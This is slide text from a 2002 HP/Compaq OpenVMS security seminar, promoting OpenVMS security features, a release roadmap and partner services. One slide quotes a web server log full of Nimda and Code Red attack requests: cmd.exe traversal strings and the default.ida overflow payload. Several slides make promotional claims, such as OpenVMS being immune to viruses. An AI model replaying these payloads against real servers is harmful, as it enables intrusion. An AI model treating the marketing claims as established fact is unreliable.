filename\location

John Robert Wisniewski June,

2002

OpenVMS Security Seminar

filename\location

John Robert Wisniewski June,

2002

http://vmsone.com

John.wisniewski@hp.com

filename\location

Security Seminars Agenda

–1 hour 15 minutes OpenVMS And IT Security Update

John Wisniewski – OpenVMS Engineering

–10 minutes Break

–1hour 15 minutes Vulnerability assessment Antonio Martin – Point Secure

–15 minutes Q&A

– Schedule Security Consulting Session For Tomorrow

filename\location

After 25 Years… Why OpenVMS…

filename\location

VMS when computer failure is not an option!

filename\location

filename\location

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

http://story.news.yahoo.com/news?tmpl=story&cid=75&ncid=738&e=8&u=/nf/20020516/tc_nf/17784

".....the Department of Defense has been running cyber security exercises against the National Security Agency, the U.S. Air Force's 92nd Information Warfare Aggressor Squadron, and the Army's Land Information Warfare Activity.

What they have learned is that the "install-and-patch" system does not work, especially against a concentrated attack. Operating systems, they have concluded, need to be designed more securely from the outset."

filename\location

From Keith Parris’s white paper on comp.os.vmsSome here have contended that because TCP/IP Services for OpenVMS is based on Tru64 Unix code, it is thus subject to the same level of risk of buffer-overflow exploits as any Unix system out there.

After a bit of investigation, I've discovered that VMS on Alpha appears to be immune to these common smash-the-stack buffer overflow attacks.

To understand why, first one must understand how common buffer-overflow attacks work. (A classic paper on such attacks is "Smashing the Stack for Fun And Profit" written by a hacker who goes by the name Aleph One. You can read it at

http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/profit.html)

So Alpha VMS is immune to common stack-smashing buffer-overflow attacks.

While any code that fails to check data lengths against buffer sizes is arguably broken, and needs to be fixed, and Compaq has been doing this to TCP/IP code as buffer-overflow bugs are identified, such bugs are much less critical on Alpha VMS compared with less-protected implementations.

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

filename\location

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

SECURITY SEARCH BY OPERATING SYSTEM NAME

http://www.cert.org/

VMS/OpenVMS -- 45 CERT Advisories in 13 years… (2 Weeks to check)

Windows 2000 -- 484 CERT Advisories in 11 Months ( 12 weeks)

Linux -- 546 CERT Advisories since 97 (14 weeks)

Solaris -- 490 CERT Advisories in 5 years (12 weeks)

AIX -- 377 CERT Advisories since 94 (9 weeks

UNIX -- 568 CERT Advisories (14 weeks)

FOR EACH CERT ADVISORY IT WOULD TAKE 1 HOUR (average) to evaluate and potentially fixed by a knowledgeable systems engineer!

filename\location

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

SECURITY SEARCH BY COMPANY

http://www.cert.org/

Oracle --206 CERT Advisories

COMPAQ --236 CERT Advisories

CISCO --361 CERT Advisories

HP --436 CERT Advisories

IBM --626 CERT Advisories

SUN --711 CERT Advisories

MicroSoft --1018 CERT Advisories

filename\location

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

BUT MICROSOFT IS IN A CLASS BY ITSELF

http://www.cert.org/Windows 2000 484

Windows XP 21

Windows NT 359

Windows 98 138

Windows 95 75

Windows Networking 401

Windows SQL 80

Windows Visual Basic 16

Windows Visual C++ 2

Windows Visual Studio 8

Windows Java 68

Windows Netscape 71

Windows LDAP 55

Windows Active Directory 31

Windows Media Player 3

Microsoft Exchange 67

Microsoft Word 30

Microsoft Excel 28

Microsoft Power Point 5

Microsoft office 221

Microsoft Internet Explorer 214

Microsoft Chat 38

Microsoft Windows 468

Back Office 257

IIS 205

This list consists of 2845 CERT Advisories regarding MicroSoft OS and Products

Which might take as much as 1.3 YEARS to evaluate.

filename\location

OpenVMSimmune to

viruses

There has never been a reported incident of OpenVMS ever being infected with a virus

filename\location

NIMDA/Code Red VMS Apache logs

Subject: access_log. from vmsone

65.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 27765.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 27565.193.255.237 - - [28/Sep/2001:23:40:43 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 28565.193.255.237 - - [28/Sep/2001:23:40:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 28565.193.255.237 - - [28/Sep/2001:23:40:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29965.193.255.237 - - [28/Sep/2001:23:40:47 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 31665.193.255.237 - - [28/Sep/2001:23:40:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 31665.193.255.237 - - [28/Sep/2001:23:40:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 33265.193.255.237 - - [28/Sep/2001:23:40:55 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29865.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 28265.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 28265.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29965.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 29965.64.234.177 - - [29/Sep/2001:00:22:13 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:01:08:00 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:01:43:20 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 27265.64.234.177 - - [29/Sep/2001:02:11:05 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272

65.64.137.51 - - [29/Sep/2001:15:45:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 27765.64.137.51 - - [29/Sep/2001:15:46:36 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 27565.64.137.51 - - [29/Sep/2001:15:46:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 28565.64.234.177 - - [29/Sep/2001:15:52:35 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272

filename\location

OpenVMSuntouched by

hackers

In congressional testimony before the Senate Governmental Affairs Committee, the world’s most notorious hacker, Kevin Mitnick, said he could not penetrate it.

Source: Governmental Affairs Committee Hearing,March 2, 2000

filename\location

In 20 years of hacking, Kevin Mitnick says he only once failed to penetrate a

computer system.

• Regarding that unsuccessful hack attempt, Mitnick, who successfully cracked computer systems belonging to Motorola , Fujitsu and Sun Microsystems, said he targeted the computer because it belonged to an "individual" who had found vulnerabilities in Digital Equipment Corp’s VMS operating system. "And my goal was obtaining information on all security vulnerabilities so I'd be effective in compromising any security system that I chose to compromise," he said.

• However, the hacker said he found his target "extremely difficult" to crack because "this person was very, very sharp" on computer security

filename\location

Security Landscape

•2002 CSI/FBI computer crime and security survey is out and available at:

http://www.gocsi.com/

– Over 500 security practitioners surveyed

– 74% cite their internet connection as the point of attack

– 82% think independent hackers and the likely sources of attack

– Website attacks (Hacktavisim and DoS)

The face of hacking is changing…

But so too are attitudes about

hackers

69% Would not consider hiring

reformed hackers as

consultants!

Would you Hire this man?

filename\location

What is DEFCON 9

•DEFCON is the 9th Convention of Hackers held once each year in Las Vegas

•http://www.defcon.org/

•4300+ hackers invaded the Hotels around the Alexis Convention Center

OpenVMS was declared Cool and Unhackable by the DEFCON Goons (judges)

filename\location

OpenVMS At DEFCON 9

filename\location

OpenVMS At DEFCON 9

OpenVMS was given “Props” from the GoonsThe DFWLUG Hacker Squad gained much gloryAnd Hackers were given a taste of a real Operating System

OpenVMS V7.2-1H1OpenVMS V7.2-1H1shippingshippingOpenVMS V7.2-1H1OpenVMS V7.2-1H1shippingshipping

OpenVMS V7.2-2OpenVMS V7.2-2shippingshippingOpenVMS V7.2-2OpenVMS V7.2-2shippingshipping

OpenVMS V7.2-6C2OpenVMS V7.2-6C2ShippingShippingOpenVMS V7.2-6C2OpenVMS V7.2-6C2ShippingShipping

OpenVMS V7.3OpenVMS V7.3shippingshippingOpenVMS V7.3OpenVMS V7.3shippingshipping

filename\location

Release Timeline

2001 H1 V7.3

2001 H2 V7.2-2

2002 H3 V7.3-1

2002 H4 Itanium™ Processor Family - First boot

2003 H2 V7.3-x

2003 H2 Itanium™ Processor Family - 1st release

2003 H3 Itanium™ Processor Family - 2nd release

2004 H1 Itanium™ Processor Family - 3rd release

2004... New OpenVMS Itanium™ Processor Family

Functional Releases

filename\location

OpenVMS Security Directions Enabling Industry Standard Security Protocols for Enabling Industry Standard Security Protocols for Authentication and Encryption in Heterogeneous Authentication and Encryption in Heterogeneous

EnvironmentsEnvironments Protecting information with cryptography

OpenSSL (open group's secure socket layer)CDSA (common data security architecture)STUNNEL (secure tunnel)SSH (secure shell) futureIPSEC (IP security) future

Enabling access through new authentication models

KerberosNTLM (NT authentication)Application access to authentication (SYS$ACM)LDAP authentication futureXML security future

• Delivering complete security services solutions

filename\location

System 1System 1

ApplicationApplicationApplicationApplication

Web serverWeb serverWeb serverWeb server

NetworkNetworkNetworkNetwork

KernelKernelKernelKernel

networknetworknetworknetwork

System 2System 2

ApplicationApplicationApplicationApplication

Web serverWeb serverWeb serverWeb server

KernelKernelKernelKernel

DBDB

NetworkNetworkNetworkNetwork

DBDB

Expanding the Model for eBiz

• Server security

• AuthenticationAuthentication

• AuthorizationAuthorization

• Access controlAccess control

• Transport security

• ConfidentialityConfidentiality

• IntegrityIntegrity

• Non-repudiationNon-repudiation

filename\location

OpenVMS Security in 7.3-1

• Kerberos

• OpenSSL (secure socket layer)

• 64-bit API calls

• Enhanced documentation

• Certificate tool

• Stunnel (secure tunnel)

• CDSA

• Enhanced documentation

• Error reporting tools

• SYS$ACM published

filename\location

System 1System 1

Network Security

NetworkNetworkNetworkNetwork

TransportTransportTransportTransport

ApplicationApplicationApplicationApplicationApplicationApplicationApplicationApplication

Web serverWeb serverWeb serverWeb server

NetworkNetworkNetworkNetwork

KernelKernelKernelKernel

PKI toolsPKI toolsPKI toolsPKI tools

SSLSSL

IPSECIPSECIPSECIPSEC

System 2System 2

ApplicationApplicationApplicationApplication

WebWeb serverserverWebWeb serverserver

NetworkNetworkNetworkNetwork

KernelKernelKernelKernel

NetworkNetworkNetworkNetwork

KerberosKerberosSSHSSHSSHSSH

= Shipping

= Planned

filename\location

Security MUP’s and Advisories

•OpenVMS DECWindows MUP (next)

•OpenVMS Alpha 7.2

•DEC-AXPVMS-VMS72_SYS-V0100--4

•DEC-AXPVMS-VMS721_SYS-V0100--4

•OpenVMS Alpha Security MUP

ALPSMUP01_070 (Versions 6.1,6.2 & 7.0)

•OpenVMS VAX Security MUP

VAXSMUP03 (All Versions prior to 6.1)

filename\location

DECwindows MUP

DECwindows motif server has a potential security vulnerability that could be exploited to allow existing users unauthorized

access to data and system resources

• This mandatory update required a reboot

• Effected systems are only those that have DECwindows server installed on them

•  Supported versions impacted:

• OpenVMS alpha version 6.2 7.1-2, 7.2-1h1, 7.2-2, 7.3

• OpenVMS VAX version 6.2, 7.1, 7.2, 7.3

• SEVMS alpha version 6.2 & SEVMS VAX version 6.2

filename\location

ACMS Security Advisory

• There is a potential Security Vulnerability involving ACMS processes having more privileges enabled than the privileges specified in the authorization file.

• To protect against this potential security risk, Compaq is making available an update ECO for ACMS V4.3 customers running OpenVMS Alpha V7.2-1, V7.2-1H1, V7.2-2, and V7.3.

• For ACMS V4.4 customers a new version ACMS V4.4A. ACMS V4.4 customers should upgrade to V4.4A immediately.

filename\location

Open Source Security Notes

• Compaq’s SSRT (Software Security Response Team) is our voice to the CERT organization http://www.cert.org/

• Advisories: www.compaq.com/support

Specifically: http://ftp.support.compaq.com/patches/.new/security.shtml

• Current: (SNMP, PHP, zlib, Kerberos)

• No compromise of the OpenVMS System Security but data compromised could be possible.

filename\location

Kerberos VMS implementationKerberos in OpenVMS (V7.3-

1)

•Integration

– Based on MIT Kerberos V5 release 1.0.5

– Available on V7.2,7.3 (VAX & ALPHA) Web kit

– GSSAPI V2– GUI & DCL interface – KDC (Key Distribution

Center) & API’s (Client)– Cert fix

•Kerberized Telnet in TCP/IP services for OpenVMS Version 5.3

Kerberos Futures

•Next version (7.x)

•Port MIT Kerberos V5 release 1.2.4 to OpenVMS

– Provides “hooks” necessary for Kerberized TCP/IP utilities

– Triple-DES encryption available

•Make Kerberos API thread-safe

•Future versions

•Kerberos ACME plug-in

•Cluster-aware KDC

•Use CDSA for cryptographic functions

filename\location

OpenSSL for OpenVMS

• Port of OpenSSL 0.9.6b

• Layered Product (in V7.3-1 as LP) runs on 7.2-2

• Integration into Base O/S when OpenSSL hits 1.0

• PCSI kit containing

– 32-bit SSL & Crypt libraries– 64-bit SSL & Crypt libraries

• Features:

• 64-bit SSL and Crypto APIs (32 bit API’s as well)

• Alpha Performance

• Documentation & Examples

– New Book – Open Source Security on OpenVMS Alpha– 200 SSL APIs (60 previously undocumented)– 40 Crypt APIs (10 Previously undocumented)

• Certificate Tool

filename\location

OpenSSL limitationsOpenSSL is a set of libraries that cannot secure OpenSSL is a set of libraries that cannot secure

applications without modification to the application.applications without modification to the application.

OpenSSL alone cannot secure popular TCP/IP applications OpenSSL alone cannot secure popular TCP/IP applications such as telnet and FTP/RCPsuch as telnet and FTP/RCP

Solutions:

•SSH1 and SSH2 - secure shell

–TCP/IP services 5.3 security EAK (fall)–Process software http://www.process.com–OpenSSH

•Stunnel (www.stunnel.Org)

–SSL wrapper for TCP/IP application

filename\location

Stunnel (Secure Tunnel)Stunnel is an SSL encryption wrapper between client and a server that enables

non-SSL aware daemons to communicate with clients over a secure SSL channel.

Stunnel can be used to add SSL functionality to commonly used inetd daemons like POP-2, POP-3 and IMAP servers without any changes in the

programs' code.

•Open Source Project provided on the OpenSource Projects CD.

Limited support

Telnet & RCP works but no FTP

Threaded SMP support!

•Website: http://www.stunnel.org

filename\location

3. Application: (telnet localhost 992)

How STUNNEL works

1. SSL server:1. SSL server: (stunnel -d 992 -r localhost:23 -p stunnel.pem)(stunnel -d 992 -r localhost:23 -p stunnel.pem)2. SSL client: (stunnel -c -d 992 -r remote:992)

IP

TCP

Application

SSLserver

(Stunnel)

IP

TCP

Application

SSLclient

(Stunnel)

1

2(SSL)

3

filename\location

KerberosKerberosAPIAPI

SSL crypto librarySSL crypto library BSAFEBSAFE PKI/CertificatePKI/Certificate

OpenSSLOpenSSL

Application Security

CDSACDSA

Crypto appsCrypto apps S/MIMES/MIME PKIPKI

CryptographyCryptographyCryptographyCryptography

= Shipping

= Planned

filename\location

CDSA ArchitectureCDSA Architecture

AC Module Manager

TP Module Manager

CSP Manager

CDSA Applications

Integrity Services Security Contexts

CL Module Manager

CSSM Security API

Cryptographic Service Provider

SPI

Trust Model Library

TPI

DL Module Manager

Authorization

Computation Library

ACI

Certificate Library

CLI

Data Storage Library

DLI

filename\location

CDSA for OpenVMS

•Shipping as Part of 7.3-1

•Based on CDSA V2 release 3.11 with some 3.12 features

•Port of Tru-64 implementation with Bilateral authentication

•Prerequisite for IPSEC (will run on 7.2-2 and up)

•Contains RSA & OpenSSL as Crypto Service Providers.

•Documentation & Examples

–New Book – Open Source Security on OpenVMS Alpha Vol 1–2 example programs: DES, MDS

filename\location

SYS$ACM

• Published and supported in 7.3-1

• Reduces Authentication Calls/steps from 12 to 1!

• Example:

CSWS for OpenVMS will use this for mod_auth_openvms

• Part 1 7.3-1 SYS$ACM published!

• Part 2 7.next (VMS) Complete framework for external authentication solution (EAK)

– NDA Document “ACME Developers Guide”– New ACME Loginout & Set Password images (not

defaults)

filename\location

LDAP V3 in OpenVMS 7.3

• OpenVMS 7.3 includes an LDAP V3 API to enable access to LDAP directories anywhere in the enterprise.

• LDAP supports multi-threaded 64-bit & 32-bit applications and is COM (Common Object Model) aware. 

• Certification efforts

• Microsoft’s Active Directory

• Novell’s NDS

• Compaq’s X.500 V4.0

• Kerberos V5 & Public Key Infrastructure (PKI).

filename\location

LDAP-based authentication

LDAP-basedSystem auth

LDAP: username/password + UAF mappingUAF: quota, security profile

Web auth

loginoutftptelnet }

LDAPdirectory

LDAPdirectory

CSWSCSWSloginoutloginout

$ACM$ACM auth_ldapauth_ldap mod_auth_vmsmod_auth_vms

LDAPLDAPVMSVMS

Exists

Exists

New New

Legend:

System authentication Web authentication

UAFUAF Mapping infoMapping info

UAFUAF

filename\location

LDAP – THE FUTURE DIRECTION OF OPENVMS AUTHENTICATION

Single username & password across enterprise

•LDAP directory just stores Username and Password.

•Usable by many platforms provided they agree on the same style of LDAP authentication. (Example Web page or VMS/Unix login all use same Username & password.)

•Once Authenticated the user is mapped back to a local UAF record.

•Implemented inside the ACME framework.

•Plans are in place to do this work.

filename\location

3. Token-based authentication

X509directory

X509directory

loginoutloginout

$ACM$ACM

VMSVMS “x”“x”

CDSA/EMMCDSA/EMM

Smart cardSmart card

Private keyPrivate key

Exists

Exists

New New

Legend:

filename\location

OpenVMS Security Roadmap

Alternative Authentication• BIOMETRIC support • Smartcard

ITSEC C2 Security Evaluation on V7.2-2

Version 7.x• Updated versions of:

•OpenSSL•Kerberos•CDSA

•Unix Portability features:•UID/GUID support•Case Sensitive Passwords•Minimum lifetime•CDE deadman•CDE screenlock

•ACME LOGIN Early Adopters Kit (EAK)

2002 2003 2004 2005

Version 7.3-1(Alpha only)

• CDSA (For IPSEC) • OpenSSL API Published • SYS$ACM API Published• Kerberos integration • Stunnel (Secure Tunnel)

Version 7.x(Alpha and VAX)• ACME Login base deployment

Encryption for OpenVMS V1.6

TCP/IP

Security EAK

filename\location

got secure web sites?

filename\location

a recent headlineMicrosoft released a “critical” security patch Wednesday for its Web server software, plugging 10 new holes that could allow hackers to take full control of computers running the company’s Internet Information Server (IIS) program.

Microsoft issues “critical” server fixApril 10, 2002

http://news.com.com/2100-1001-880179.html

filename\location

But wait, there’s more!

•One in Nine IIS Servers Compromised, Survey SaysNovember 5, 2001 – pcworld.com

•Security hole in SQL Server lets attackers take over

June 13, 2001 – infoworld.com

•Worm hits thousands of Solaris and IIS serversMay 11, 2001 – infoworld.com

•Microsoft gives a virus to its support customersApril 27, 2001 – infoworld.com

filename\location

Oh, by the way, hackers and viruses aren’t going away

Source: Carnegie Mellon’s Software Engineering Institute

Note that an incident may involve one site, hundreds of sites, or thousands of sites.

Incidents per year

1

10

100

1,000

10,000

100,000

1988 1993 1998 2003

filename\location

don’t treat the symptoms,

cure the disease

Instead of trying to patch your existing web servers again and again and again, start with…

• the most stable,

• the most secure,

• the most reliable server operating system:

OpenVMSStill, nothing stops it

filename\location

OpenVMSimmune to

viruses

There has never been a reported incident of OpenVMS ever being infected with a virus

filename\location

OpenVMSsecure and stable

out of the box

Security

• OpenVMS received a U.S. Trusted Computer System Evaluation Criteria (TCSEC) C2 Security Rating

• Cluster-wide, cluster aware intrusion detection

Stability

• OpenVMS doesn’t fall down

– Often put in a closet and “forgotten”

– Eighteen years without rebooting

• It’s the gold standard for high availability clustering, up to 96 nodes in a cluster

filename\location

HP Secure Web Server for OpenVMS(based on Apache)

Based on the Apache Software Foundation’s “HTTP Server” open source project known as “Apache” – http://httpd.apache.org

OpenVMS is the foundation for…

filename\location

Some Apache info… HTTP/1.1 (RFC2616) compliant web server

Runs on Windows, Linux, UNIX, OpenVMS, ...And Apache is the most popular web server on the Internet with a 63% market share

• http://www.netcraft.com/survey

Some companies drop Microsoft IISfor ApacheOctober 4, 2001

http://www.internetweek.com/newslead01/lead100401.htm

filename\location

HP Secure Web Server (SWS) for

OpenVMS

• Based on recent Apache baselevels

• Tailored for OpenVMS cluster and security architecture

• Includes SSL (certificate-based authentication and encryption services for sockets)

• VeriSign supported platform, for additional security levels

– http://www.verisign.com/support/install/

• www.openvms.compaq.com is running SWS

filename\location

SWS softwareand support

Where to get SWS software:

• http://www.openvms.compaq.com/openvms/products/ips/apache/csws.html

• e-Business CD shipped with OpenVMS software

Software cost: no cost, it’s FREE!

Support: included in standard OpenVMS license agreement at no additional cost

filename\location

for more information

SWS web site

• http://www.openvms.compaq.com/openvms/products/ips/apache/csws.html

filename\location

OpenVMS System OpenVMS System

ManagementManagement

filename\location

OpenVMSOpenVMS ToolTool PlansPlans

•Availability Manager

–V2.2 VMS 7.3-1 support (end of Summer)–V2.3 DECamds parity, no process event, write locks, low vote,

etc

•Graphical Configuration Manager V1.0 to ship with 7.3-1

•OpenVMS Web Agents V2.3 released in April

–Integrates with CIM 7, supports OVMS 7.1 - 7.3–Supports new AlphaServer environmentals for DS, ES and GS series

•ECP Data Collector & Performance Analyzer V5.4B with

VMS 7.3-1

•Increase access to metrics via system services, industry

standard SNMP MIBS & general performance data collector

filename\location

•Availability Manager

–Real time performance monitor for OpenVMS system managers–Collects system & process data and is under active

development

•ECP Data Collector & Performance Analyzer

–Historical GUI performance analyzer for OpenVMS–Maintenance releases & limited in scope

•Third Party Performance Solutions (BMC, CA, etc.)

–Enterprise level multi platform integrated solutions

Performance Solution PositioningPerformance Solution Positioning

filename\location

HP OpenView ConnectivityHP OpenView Connectivity

•CIM Enterprise solution

–Plug in for HP OpenView–Used in conjunction with OpenVMS Web agent–OVMS Web Agents to CIM Plug-in to HP OpenView

•Comtek Services (www.comtekservices.com)

–Develop OVMS SNMP Performance Agents –OpenVMS HP OpenView Network Node Manager (NNM)–300 data collection objects and 50 traps for OpenVMS–75 data objects, 30 traps & performance graphs for HP

OpenView

filename\location

POLYCENTER Evolution on OpenVMS – Single Products

POLYCENTER PerformanceAdvisor, Data Collector,Accounting Chargeback

POLYCENTER Console Manager

POLYCENTER System Watchdog

POLYCENTER Scheduler

BMC Perform & Predict for OpenVMShttp://www.bmc.com

TECSYS ConsoleWorks for OpenVMShttp://www.tdix.com

BMC Patrol for OpenVMShttp://www.bmc.com

ISE EnterpriseSchedulehttp://www.i-s-e.com

Data/Database ConversionATTUNITYhttp://www.attunity.com

ARGENT MVP Schedulerhttp://www.jams.argent-software.com

SECURITY AUDIT POINT SECURE System Detectivehttp://www.pointsecure.com

DVD/CD/CDR/WORM/OPTICALU.S. Design for OpenVMShttp://www.usdesign.com

filename\location

BMC Software AllianceBMC Software Alliance

•OpenVMS/ BMC Technology & Marketing agreement

in place for 1 Year

•Joint development effort has integrated an OpenVMS data

collector for BMC Patrol Perform & Predict

–Offering consistent reporting & analysis of Disk I/O, Process, Cluster Configuration, System Parameter & Performance Metrics–Delivers improved problem analysis & more accurate capacity

planningthan OpenVMS Monitor data–Supports enhanced workload analysis for a business-centric view of OpenVMS resource requirements

•BMC Software has made significant investment to bring OpenVMS up to parity with Unix and MS Windows product offerings

filename\location

BMC Software Cont’dBMC Software Cont’d

•OpenVMS lab testing for BMC Patrol for OpenVMS

–Gains in CPU utilization efficiencies implemented

•Improved BMC OpenVMS release schedule

–Patrol for OpenVMS V2.4 – January 2002–Patrol Perform & Predict V4.5 – April 2002–Patrol for OpenVMS V2.5 – Planned June 2002

•BMC OpenVMS functional improvements:

–Enterprise management station for all Compaq Platforms–Improved user interface for menu selection–Additional information on process resource utilization–More accurate data analysis on a native OpenVMS platform–Enhanced security for Patrol for OpenVMS (SSL, 5 security

levels, etc)

filename\location

BMC Software Cont’dBMC Software Cont’d

•BMC TDI ConsoleWorks integration for OpenVMS

–TDI ConsoleWorks now certified by BMC on the Patrol console–TDI to map console events to BMC Patrol Console Manager–TDI to become re-seller of BMC products

•Free trial down loads of the Patrol for OpenVMS solution

available on the BMC Software web site

TDC data collector down load (www.openvms.compaq.com/openvms/products/tdc/index.html)

filename\location

Computer Associates UpdateComputer Associates Update

•CA’s portfolio of products running on OpenVMS contain:

•Unicenter brand of enterprise management products

• eTrust brand of security products

• BrightStor brand of Storage products

• Advantage brand of data mgt products, including Ingres database

•CA OpenVMS solutions have gone through a re-branding

filename\location

POLYCENTER Evolution on OpenVMS – with Unicenter Branded Modular

Solutions

POLYCENTER PerformanceAdvisor, Data Collector,Accounting Chargeback

POLYCENTER Console Manager

POLYCENTER System Watchdog

POLYCENTER Scheduler

Unicenter Performance ManagementFor OpenVMS

Unicenter Console ManagementFor OpenVMS

Unicenter System WatchdogFor OpenVMS

Unicenter Job ManagementFor OpenVMS

filename\location

SecurityServices

OpenVMS Security Services

filename\location

security healthchecks with

tools from PointSecure

Security Healthcheck Service for OpenVMS (SHSO)

• A full Services-led OpenVMS security review utilizing hp services & assessment tools

• Generates a report on state of system security

• Security Self-Check for OpenVMS (SSCO)

• Customer self-check

– PointAudit– System Detective– SAT

• Implementation, training & support provides through HP Services

• Customer keeps tools

filename\location

Recent Security Automation

Large Hospital environment with 388,845 logins/month

Challenge:

•to automate to a manual security process

•tools which adhere to today’s best practice

•flexibility for assisting with HIPAA compliance

Solution: Point Audit and System Detective from PointSecure, an OpenVMS-only software partner

filename\location

enhancing securitywith SyntheSys

JabCast Secure Realtime Communications (SRC)

Secure real-time interactive text, file and document exchange across multiple operating systems.

The idSURE Card™

A biometric crypto-processing smart card integrated with a Public Key Infrastructure (PKI), digital signatures, and a Trust Center.

-available today on IP interface

-Available July on OpenVMS machine hardware interfaces

filename\location

Compaq Services

Security Service Descriptions

Security Policy development

Security Policy deployment

System Health Check

System Detective Installation

Remote Security Monitoring

Smart Card Installation/Deployment

Security Audit of Your Site

Wireless Audit of Your Site

Compaq can help with as much or as little security assistance as you need.

filename\location

If you are interested in VMS security

http://www.dfwcug.org/ Quadwords Newsletter

http://vmsone.com/ Rabid VMS stuff

http://www.cert.org/ Security advisories

http://cve.mitre.org/cve/ Security advisories

http://www.support.compaq.com/patches/mailing-list.shtml

http://pulhas.org/xploits/ System Holes since 1996;-)

